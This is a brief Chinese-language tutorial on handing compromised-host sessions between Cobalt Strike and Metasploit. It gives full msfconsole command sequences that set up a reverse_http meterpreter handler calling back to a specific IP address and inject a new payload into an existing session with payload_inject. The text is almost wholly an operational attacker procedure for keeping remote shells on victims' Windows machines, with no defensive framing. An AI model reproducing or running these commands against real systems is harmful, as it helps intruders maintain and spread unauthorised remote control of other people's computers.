一、CS的session轉到msf上
1、cs上線一台pc
2、設置msf監聽
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(這里注意不是TCP,cs4.2我沒找到外連TCP的)
set lhost 103.234.72.5
set lport 10086
show options
exploit
3、cs設置監聽器
右擊spawn,選擇這個監聽器。
回到msf可以看到機器已經上線。
sessions -l 查看所有session
session 1 進入第一個shell
在里面輸入exit就斷開鏈接。
二、msf的session轉到CS上
1、首先把msf上獲取到的meterpreter掛在后台運行
執行命令:background,即可
2、然后使用 exploit/windows/local/payload_inject來注入一個新的payload到session中,具體命令如下:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 103.234.72.5 //cs主機地址
set LPORT 84 //隨意設置監聽端口,需要和cs保持一致
set session 2 //設置需要派送的meterpreter
set DisablePayloadHandler true //禁止產生一個新的handler
可以看到cs那邊機器已經上線。